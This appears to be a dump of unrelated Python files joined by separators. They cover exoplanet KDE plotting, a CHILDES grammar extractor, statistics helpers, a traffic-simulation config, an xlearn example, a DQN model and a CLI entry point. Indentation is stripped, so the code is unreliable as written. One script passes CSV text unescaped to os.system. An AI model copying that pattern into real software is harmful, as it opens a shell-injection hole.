kde_pts, bw_pts = kde_kNN_bw(tdur_kde_all[sample][n], tdur_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(tdur_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(tdur_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_durations_compare.pdf')
plt.close()
# Circular normalized transit durations (separate singles and multis):
tdur_tcirc_axis = np.linspace(0., 1.5, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), y_max=5, extra_text='Observed singles', xlabel_text=r'$t_{\rm dur}/t_{\rm circ}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = tdur_tcirc_1_kde_Kep[sample](tdur_tcirc_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(tdur_tcirc_1_kde_Kep[sample], tdur_tcirc_axis, kNN_factor=kNN_factor)
plt.plot(tdur_tcirc_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = tdur_tcirc_1_kde_all[sample][n](tdur_tcirc_axis)
kde_pts, bw_pts = kde_kNN_bw(tdur_tcirc_1_kde_all[sample][n], tdur_tcirc_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(tdur_tcirc_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
#kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
plt.fill_between(tdur_tcirc_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_tdur_tcirc_singles_compare.pdf')
plt.close()
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), y_max=5, extra_text='Observed multis', xlabel_text=r'$t_{\rm dur}/t_{\rm circ}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = tdur_tcirc_2p_kde_Kep[sample](tdur_tcirc_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(tdur_tcirc_2p_kde_Kep[sample], tdur_tcirc_axis, kNN_factor=kNN_factor)
plt.plot(tdur_tcirc_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = tdur_tcirc_2p_kde_all[sample][n](tdur_tcirc_axis)
kde_pts, bw_pts = kde_kNN_bw(tdur_tcirc_2p_kde_all[sample][n], tdur_tcirc_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(tdur_tcirc_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
#kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
plt.fill_between(tdur_tcirc_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_tdur_tcirc_multis_compare.pdf')
plt.close()
# Transit depths:
D_axis = np.logspace(-5., -1.5, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(D_axis), x_max=np.max(D_axis), y_max=1.4, log_x=True, xlabel_text=r'$\delta$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = D_kde_Kep[sample](np.log10(D_axis))
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(D_kde_Kep[sample], np.log10(D_axis), kNN_factor=kNN_factor)
plt.plot(D_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = D_kde_all[sample][n](np.log10(D_axis))
kde_pts, bw_pts = kde_kNN_bw(D_kde_all[sample][n], np.log10(D_axis), kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(D_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(D_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_depths_compare.pdf')
plt.close()
# Planet radii:
radii_axis = np.linspace(radii_min, radii_max, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=radii_min, x_max=radii_max, y_max=0.5, xlabel_text=r'$R_p (R_\oplus)$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = radii_kde_Kep[sample](radii_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(radii_kde_Kep[sample], radii_axis, kNN_factor=kNN_factor)
plt.plot(radii_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = radii_kde_all[sample][n](radii_axis)
kde_pts, bw_pts = kde_kNN_bw(radii_kde_all[sample][n], radii_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(radii_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(radii_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_radii_compare.pdf')
plt.close()
# Stellar radii:
Rstar_axis = np.linspace(0.5, 2.5, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(Rstar_axis), x_max=np.max(Rstar_axis), y_max=3, xlabel_text=r'$R_\star (R_\odot)$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = Rstar_kde_Kep[sample](Rstar_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(Rstar_kde_Kep[sample], Rstar_axis, kNN_factor=kNN_factor)
plt.plot(Rstar_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = Rstar_kde_all[sample][n](Rstar_axis)
kde_pts, bw_pts = kde_kNN_bw(Rstar_kde_all[sample][n], Rstar_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(Rstar_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(Rstar_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_stellar_radii_compare.pdf')
plt.close()
# Transit depth ratios:
D_ratio_axis = np.logspace(-1.5, 1.5, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(D_ratio_axis), x_max=np.max(D_ratio_axis), y_max=1.6, log_x=True, xlabel_text=r'$\delta_{i+1}/\delta_i$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = D_ratio_kde_Kep[sample](np.log10(D_ratio_axis))
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(D_ratio_kde_Kep[sample], np.log10(D_ratio_axis), kNN_factor=kNN_factor)
plt.plot(D_ratio_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = D_ratio_kde_all[sample][n](np.log10(D_ratio_axis))
kde_pts, bw_pts = kde_kNN_bw(D_ratio_kde_all[sample][n], np.log10(D_ratio_axis), kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(D_ratio_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(D_ratio_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_depthratios_compare.pdf')
plt.close()
# Log(xi):
xi_axis = np.linspace(-0.5, 0.5, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(xi_axis), x_max=np.max(xi_axis), y_max=10, xlabel_text=r'$\log{\xi}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = xi_kde_Kep[sample](xi_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(xi_kde_Kep[sample], xi_axis, kNN_factor=kNN_factor)
plt.plot(xi_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = xi_kde_all[sample][n](xi_axis)
kde_pts, bw_pts = kde_kNN_bw(xi_kde_all[sample][n], xi_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(xi_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(xi_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_logxi_all_compare.pdf')
plt.close()
# Log(xi) (not near MMR):
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(xi_axis), x_max=np.max(xi_axis), y_max=10, extra_text='Not near MMR', xlabel_text=r'$\log{\xi}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = xi_nonres_kde_Kep[sample](xi_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(xi_nonres_kde_Kep[sample], xi_axis, kNN_factor=kNN_factor)
plt.plot(xi_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = xi_nonres_kde_all[sample][n](xi_axis)
kde_pts, bw_pts = kde_kNN_bw(xi_nonres_kde_all[sample][n], xi_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(xi_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(xi_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_logxi_nonmmr_compare.pdf')
plt.close()
# Log(xi) (near MMR):
plot_fig_pdf_simple(fig_size, [], [], x_min=np.min(xi_axis), x_max=np.max(xi_axis), y_max=10, extra_text='Near MMR', xlabel_text=r'$\log{\xi}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = xi_res_kde_Kep[sample](xi_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(xi_res_kde_Kep[sample], xi_axis, kNN_factor=kNN_factor)
plt.plot(xi_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = xi_res_kde_all[sample][n](xi_axis)
kde_pts, bw_pts = kde_kNN_bw(xi_res_kde_all[sample][n], xi_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(xi_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(xi_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_logxi_mmr_compare.pdf')
plt.close()
### GF2020 metrics:
# Planet radii partitioning:
radii_partitioning_axis = np.logspace(-5., 0., pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=1e-5, x_max=1., y_max=0.7, xlabel_text=r'$\mathcal{Q}_R$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = radii_partitioning_kde_Kep[sample](np.log10(radii_partitioning_axis))
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(radii_partitioning_kde_Kep[sample], np.log10(radii_partitioning_axis), kNN_factor=kNN_factor)
plt.plot(radii_partitioning_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = radii_partitioning_kde_all[sample][n](np.log10(radii_partitioning_axis))
kde_pts, bw_pts = kde_kNN_bw(radii_partitioning_kde_all[sample][n], np.log10(radii_partitioning_axis), kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(radii_partitioning_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(radii_partitioning_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_radii_partitioning_compare.pdf')
plt.close()
# Planet radii monotonicity:
radii_monotonicity_axis = np.linspace(-0.5, 0.6, pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=-0.5, x_max=0.6, y_max=4, xlabel_text=r'$\mathcal{M}_R$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = radii_monotonicity_kde_Kep[sample](radii_monotonicity_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(radii_monotonicity_kde_Kep[sample], radii_monotonicity_axis, kNN_factor=kNN_factor)
plt.plot(radii_monotonicity_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = radii_monotonicity_kde_all[sample][n](radii_monotonicity_axis)
kde_pts, bw_pts = kde_kNN_bw(radii_monotonicity_kde_all[sample][n], radii_monotonicity_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(radii_monotonicity_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(radii_monotonicity_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_radii_monotonicity_compare.pdf')
plt.close()
# Gap complexity:
gap_complexity_axis = np.linspace(0., 1., pts)
plot_fig_pdf_simple(fig_size, [], [], x_min=0., x_max=1., y_max=10, xlabel_text=r'$\mathcal{C}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs, fig_lbrt=fig_lbrt)
for i,sample in enumerate(split_names):
#kde_pts_Kep = gap_complexity_kde_Kep[sample](gap_complexity_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(gap_complexity_kde_Kep[sample], gap_complexity_axis, kNN_factor=kNN_factor)
plt.plot(gap_complexity_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = gap_complexity_kde_all[sample][n](gap_complexity_axis)
kde_pts, bw_pts = kde_kNN_bw(gap_complexity_kde_all[sample][n], gap_complexity_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(gap_complexity_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(gap_complexity_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_gap_complexity_compare.pdf')
plt.close()
plt.show()
#plt.close()
##### Circular normalized durations for singles and multis with PDFs and CDFs:
#'''
fig = plt.figure(figsize=(8,5))
plot = GridSpec(2,1,left=0.15,bottom=0.2,right=0.95,top=0.95,wspace=0,hspace=0)
ax = plt.subplot(plot[0,0]) # CDF
plot_panel_cdf_simple(ax, [sss['tdur_tcirc_1_obs'] for sss in split_sss], [ssk['tdur_tcirc_1_obs'] for ssk in split_ssk], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), c_sim=split_colors, c_Kep=split_colors, ls_sim=split_linestyles, ls_Kep=['--','--'], lw=lw_Kep, labels_sim=['Simulated',None], labels_Kep=['Kepler', None], extra_text='Observed singles', xlabel_text='', afs=afs, tfs=tfs, lfs=lfs, label_dist=True)
plt.legend(loc='upper left', bbox_to_anchor=(0.01,0.75), ncol=1, frameon=False, fontsize=lfs)
plt.xticks([])
ax = plt.subplot(plot[1,0]) # PDF
plot_panel_pdf_simple(ax, [], [], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), y_max=6, xlabel_text=r'$t_{\rm dur}/t_{\rm circ}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs)
for i,sample in enumerate(split_names):
#kde_pts_Kep = tdur_tcirc_1_kde_Kep[sample](tdur_tcirc_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(tdur_tcirc_1_kde_Kep[sample], tdur_tcirc_axis, kNN_factor=kNN_factor)
plt.plot(tdur_tcirc_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = tdur_tcirc_1_kde_all[sample][n](tdur_tcirc_axis)
kde_pts, bw_pts = kde_kNN_bw(tdur_tcirc_1_kde_all[sample][n], tdur_tcirc_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(tdur_tcirc_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(tdur_tcirc_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_tdur_tcirc_singles_compare_with_CDFs.pdf')
plt.close()
fig = plt.figure(figsize=(8,5))
plot = GridSpec(2,1,left=0.15,bottom=0.2,right=0.95,top=0.95,wspace=0,hspace=0)
ax = plt.subplot(plot[0,0]) # CDF
plot_panel_cdf_simple(ax, [sss['tdur_tcirc_2p_obs'] for sss in split_sss], [ssk['tdur_tcirc_2p_obs'] for ssk in split_ssk], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), c_sim=split_colors, c_Kep=split_colors, ls_sim=split_linestyles, ls_Kep=['--','--'], lw=lw_Kep, labels_sim=['Simulated',None], labels_Kep=['Kepler', None], extra_text='Observed multis', xlabel_text='', afs=afs, tfs=tfs, lfs=lfs, label_dist=True)
plt.xticks([])
ax = plt.subplot(plot[1,0]) # PDF
plot_panel_pdf_simple(ax, [], [], x_min=np.min(tdur_tcirc_axis), x_max=np.max(tdur_tcirc_axis), y_max=6, xlabel_text=r'$t_{\rm dur}/t_{\rm circ}$', ylabel_text='Density', afs=afs, tfs=tfs, lfs=lfs)
for i,sample in enumerate(split_names):
#kde_pts_Kep = tdur_tcirc_2p_kde_Kep[sample](tdur_tcirc_axis)
kde_pts_Kep, bw_pts_Kep = kde_kNN_bw(tdur_tcirc_2p_kde_Kep[sample], tdur_tcirc_axis, kNN_factor=kNN_factor)
plt.plot(tdur_tcirc_axis, kde_pts_Kep, ls='--', lw=lw_Kep, color=split_colors[i])
kde_pts_all = np.zeros((runs, pts))
for n in range(runs):
#kde_pts = tdur_tcirc_2p_kde_all[sample][n](tdur_tcirc_axis)
kde_pts, bw_pts = kde_kNN_bw(tdur_tcirc_2p_kde_all[sample][n], tdur_tcirc_axis, kNN_factor=kNN_factor)
kde_pts_all[n,:] = kde_pts
plt.plot(tdur_tcirc_axis, kde_pts, lw=lw_sim, alpha=alpha, color=split_colors[i])
kde_pts_qtls = np.quantile(kde_pts_all, [0.16,0.84], axis=0)
#plt.fill_between(tdur_tcirc_axis, kde_pts_qtls[0,:], kde_pts_qtls[1,:], color=split_colors[i], alpha=alpha)
if savefigures:
plt.savefig(savefigures_directory + subdirectory + model_name + '_tdur_tcirc_multis_compare_with_CDFs.pdf')
plt.close()
plt.show()
#'''
|
#! /usr/bin/env python
usage = """%prog Version of 26th May 2010
(c) Mark Johnson
Extracts a grammar from a CHILDES file
usage: %prog [options]"""
import optparse, re, sys
import lx, tb
def read_childes(inf):
"""Reads a CHILDES file, and yields a dictionary for each record
with key-value pairs for each field"""
for record in inf.read().split("*mot:\t")[1:]:
key_val = {}
fields = record.split("\n%")
key_val['mot'] = fields[0].strip()
for field in fields[1:]:
[key, val] = field.split(":\t", 1)
key = intern(key.strip())
val = val.strip()
if val != '':
key_val[key] = val
yield key_val
def write_gold(records, phon_topic, outf):
for record in records:
pho = record['pho'].split()
intent = record.get('int', None)
line = ' '.join((p if p not in phon_topic or phon_topic[p] != intent else "%s_%s"%(p,phon_topic[p]) for p in pho))
outf.write("%s\n"%line)
def write_train(records, outf):
for record in records:
pho = record['pho']
pho = ' '.join(pho.replace(' ', ''))
ref = record.get('ref')
if ref:
refs = list(set(ref.split()))
refs.sort()
ref = 'T_'+'|'.join(refs)
else:
ref = 'T_None'
outf.write("%s\t%s\n"%(ref, pho))
if __name__ == "__main__":
parser = optparse.OptionParser(usage=usage)
parser.add_option("-c", "--childes-data", dest="childes_data",
help="input file containing CHILDES data")
parser.add_option("-p", "--phon-topic", dest="phon_topic",
help="input file containing phon->topic mapping")
parser.add_option("-g", "--gold", dest="gold",
help="output file containing gold training data")
parser.add_option("-t", "--train", dest="train",
help="output file containing training data")
(options,args) = parser.parse_args()
assert(len(args) == 0)
assert(options.childes_data != None)
childes = list(read_childes(file(options.childes_data, "rU")))
phon_topic = {}
if options.phon_topic:
for line in file(options.phon_topic, "rU"):
ws = line.split()
assert(len(ws) == 2)
phon_topic[ws[0]] = ws[1]
if options.gold:
write_gold(childes, phon_topic, file(options.gold, "w"))
if options.train:
write_train(childes, file(options.train, "w"))
|
"""
Copyright 2019 Samsung SDS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pandas as pd
import numpy as np
import scipy.stats
# NOTE: all parameter 'a' is assumed as array-like
def max(a): return np.max(a)
def min(a): return np.min(a)
def range(a): return np.max(a) - np.min(a)
def sum(a): return np.sum(a)
def mean(a): return np.mean(a)
def var(a): return np.var(a)
def var_samp(a): return np.var(a, ddof=1)
def std(a): return np.std(a)
def skewness(a): return scipy.stats.skew(a)
def kurtosis(a): return scipy.stats.kurtosis(a)
def median(a): return np.median(a)
def percentile(a, q): return np.percentile(a, q)
def trimmed_mean(a, proportiontocut): return scipy.stats.trim_mean(a, proportiontocut)
def iqr(a): return scipy.stats.iqr(a)
def q1(a): return np.percentile(a, 25)
def q3(a): return np.percentile(a, 75)
def mode(a):
a = np.array(a)
a = a[np.where(~pd.isnull(a))]
vals, cnts = np.unique(a, return_counts=True)
return vals[np.where(cnts==np.max(cnts))]
def num_row(a): return len(a)
def num_value(a): return np.count_nonzero(~pd.isnull(a))
def num_nan(a): return np.count_nonzero([x is np.nan for x in a])
def num_nullonly(a): return np.count_nonzero([x is None for x in a])
def num_null(a): return np.count_nonzero(pd.isnull(a))
def num_distinct(a): return np.count_nonzero(np.unique(a))
|
# The network config (links to the net) we use for our simulation
sumoConfig = "A9_conf.sumocfg"
# The network net we use for our simulation
sumoNet = "A9.net.xml"
mqttUpdates = False
mqttHost = "localhost"
mqttPort = "1883"
# should it use kafka for config changes & publishing data (else it uses json file)
kafkaUpdates = True
# the kafka host we want to send our messages to
kafkaHost = "kafka:9092"
# the topics we send the kafka messages to
kafkaTopicMeanCarData = "platooning-car-data"
kafkaTopicDurations = "platooning-trip-durations"
kafkaTopicPlatooningData = "platooning-data"
# where we receive system changes
kafkaPlatoonConfigTopic = "platooning-config"
# Initial wait time before publishing data, should not be changed
ignore_first_n_results = 350
# True if we want to use the SUMO GUI
sumoUseGUI = False
# startEdgeID & lastEdgeID denotes lower & upper edges, i.e. extreme points of the map
startEdgeID = "11S"
lastEdgeID = "23805795"
''' one of these will be selected (in randomized manner) as exit edge of each car '''
# edgeIDsForExit = ["135586672#0", "12N", "286344111", "286344110", "23805795"]
edgeIDsAndNumberOfLanesForExit = {
"135586672#0": 4
}
# TODO: uncomment following for production?
# edgeIDsAndNumberOfLanesForExit = {
# "135586672#0": 4,
# "12N": 5,
# "286344111": 3,
# "286344110": 4,
# "23805795": 3
# }
# you can also set contextual parameters
parameters = dict(
contextual=dict(
lookAheadDistance=500.0, # distance to find a leader vehicle in the simulation
switchImpatienceFactor=0.1,
platoonCarCounter=250,
totalCarCounter=250, # set totalCarCounter as platoonCarCounter, other scenario is not tested excessively
extended_simpla_logic=True
),
changeable=dict(
maxVehiclesInPlatoon=10,
catchupDistance=500.0,
maxPlatoonGap=500.0,
platoonSplitTime=10.0,
joinDistance=3000.0 # to find extreme positions (-+d) of platoon
)
)
|
print long
print long(3.0)
print long(3)
print type(long(3.0))
print type(long(3))
|
import csv
import os
filename = input("what is the name of the exported CSV file: ")
print(filename)
with open(filename,'r') as f:
reader = csv.reader(f)
next(f)
next(f)
for row in reader:
date = row[0]
hour = row[2]
minute = row[3]
level = row[4]
levelText = row[5]
comment = row[6]
dateWithTime = '{0} {1}:{2}'.format(date,hour,minute)
text = '''
## DayScore: *{0} {1}*
{2}
Imported from iMoodJournal
'''.format(level,levelText,comment)
s = 'dayone2 --date="{0}" new "{1}"'.format(dateWithTime,text)
os.system(s)
|
import numpy as np
import xlearn as xl
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
# Load dataset
iris_data = load_iris()
X = iris_data['data']
y = (iris_data['target'] == 2)
X_train, \
X_val, \
y_train, \
y_val = train_test_split(X, y, test_size=0.3, random_state=0)
# param:
# 0. binary classification
# 1. model scale: 0.1
# 2. epoch number: 10 (auto early-stop)
# 3. learning rate: 0.1
# 4. regular lambda: 1.0
# 5. use sgd optimization method
linear_model = xl.LRModel(task='binary', init=0.1,
epoch=10, lr=0.1,
reg_lambda=1.0, opt='sgd')
# Start to train
linear_model.fit(X_train, y_train,
eval_set=[X_val, y_val],
is_lock_free=False)
# print model weights
print(linear_model.weights)
# Generate predictions
y_pred = linear_model.predict(X_val)
|
import click
from . import wrapboto
from .config import read_config
from .commands import config, cluster, apply, create, update, delete, describe, get, logs, stop, top
from .colorize import HelpColorsGroup
@click.group(cls=HelpColorsGroup)
@click.pass_context
def cli(ctx):
aws_credentials = {}
for k, v in read_config().items():
if k in ctx.obj:
ctx.obj[k] = v
if str(k).startswith('aws'):
aws_credentials[k] = v
ctx.obj['bw'] = wrapboto.BotoWrapper(**aws_credentials)
cli.add_command(config.config)
cli.add_command(cluster.drain)
cli.add_command(cluster.undrain)
cli.add_command(cluster.run)
cli.add_command(cluster.scale)
cli.add_command(cluster.exec_command)
cli.add_command(create.create)
cli.add_command(apply.apply)
cli.add_command(update.update)
cli.add_command(delete.delete)
cli.add_command(describe.describe)
cli.add_command(get.get)
cli.add_command(logs.logs)
cli.add_command(stop.stop)
cli.add_command(top.top)
|
import torch
import torch.nn as nn
class DQN(nn.Module):
def __init__(self, width, input_dim, output_dim, path=None, checkpoint=1):
super(DQN, self).__init__()
self._input_dim = input_dim
self._output_dim = output_dim
self._width = width
self.model_definition()
if path is not None:
print(path)
# load the model from a saved checkpoint
self.layers = torch.load(path + str(checkpoint))
def model_definition(self):
"""
Define the neural network for tye DQN agent.
"""
self.layers = nn.Sequential(
nn.Linear(self._input_dim, self._width),
nn.ReLU(),
nn.Linear(self._width, self._width),
nn.ReLU(),
nn.Linear(self._width, self._width),
nn.ReLU(),
nn.Linear(self._width, self._width),
nn.ReLU(),
nn.Linear(self._width, self._width),
nn.ReLU(),
nn.Linear(self._width, self._output_dim)
)
def forward(self, x):
"""
Execute the forward pass through the neural network
"""
return self.layers(x)
|
import Classes.DType as Type
import config
from Assembly.CodeBlocks import (createFloatConstant, createIntrinsicConstant,
createStringConstant, extra_parameterlabel,
functionlabel, fncall)
from Assembly.Registers import (norm_parameter_registers,
norm_scratch_registers,
